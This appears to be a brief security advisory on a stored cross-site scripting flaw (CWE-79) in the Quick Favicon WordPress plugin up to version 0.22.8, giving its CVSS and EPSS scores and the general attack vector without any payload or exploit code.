Improper neutralization of input during web page generation allows an attacker to store malicious JavaScript that is later reflected in the site’s pages. The vulnerability can be leveraged to execute arbitrary code in the context of a visitor’s browser, potentially leading to cookie theft, session hijack, defacement, or the delivery of secondary payloads. This flaw is identified as CWE‑79.

WordPress sites that use the Quick Favicon plugin from Robert Cummings, versions up to and including 0.22.8, are vulnerable. Any installation of this plugin within the site’s admin area that accepts user input without proper sanitization is affected.

The CVSS score of 5.9 indicates moderate severity, while an EPSS score of less than 1 % suggests a low probability of exploitation at the time of analysis. The vulnerability is not listed in the CISA KEV catalog. The likely attack vector requires an attacker to inject payload through a feature that stores data (such as a plugin option) and for that data to be subsequently displayed to other users, implying a need for access to the site’s configuration interface or an interface that allows content submission.